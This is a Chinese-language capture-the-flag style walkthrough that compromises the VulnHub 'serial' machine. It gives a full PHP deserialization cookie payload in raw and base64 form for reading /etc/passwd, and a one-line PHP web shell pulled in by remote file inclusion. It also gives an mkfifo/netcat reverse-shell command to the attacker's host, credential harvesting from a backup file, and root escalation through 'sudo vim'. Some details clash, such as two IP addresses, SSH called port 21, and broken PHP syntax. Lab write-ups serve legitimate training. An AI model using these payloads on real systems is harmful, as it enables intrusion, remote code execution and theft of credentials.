靶机下载地址
https://download.vulnhub.com/serial/serial.zip主机发现
arp-scan -l
端口扫描
nmap 192.168.229.131 -A
根据对⽐可知serial的⼀个ip地址为192.168.47.143
该靶机开启了22端⼝和80端⼝
对⽹站进⾏⼀个访问,⼤概意思为这是对新的cookie处理程序的测试版暂且搁置
目录扫描
dirb http://192.168.229.131
访问网站
发现⼀个zip⽂件
解压查看
index.php⽂件中包含user.class.php⽂件且对cookie中的user参数进⾏了序列化和base64编码
user.class.php⽂件包含log.class.php⽂件且定义了Welcome和User两个类并调⽤了
log.class.php⽂件中的handler函数
log.class.php定义了Log类和成员变量type_log且handler函数对变量进⾏了⽂件包含和输出
没有得到有用的信息
访问原⽹站,⽤Burpsuite抓包查看cookie
发现其为base64编码,对其进行解码
O:4:"User":2:{s:10:".User.name";s:3:"sk4";s:9:".User.wel";O:7:"Welcome":0:{}}7.构造payload,尝试读取passwd⽂件
O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:
8:"type_log";s:11:"/etc/passwd";}}使⽤base64编码
Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHd
lbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIj
t9fQ==
获取shell
在本机写一个txt
<?php system($_GET['cmd'];?>在创建一个木马文件
<?phpclass Log {private $type_log = "http://本机ip/1.txt";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));访问php文件
在kali开启一个监听
反弹shell
?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.229.132
+8888+>/tmp/f
反弹成功
提权
查看系统版本,内核版本
切换到根目录
cd /
ls
查看文件
cat credentials.txt.bak
使用远程连接使用之前扫出来的21端口
ssh sk4@192.168.229.131
尝试进入root
用sudo vim,进⼊到命令模式输⼊!bash
以下则是提权成功
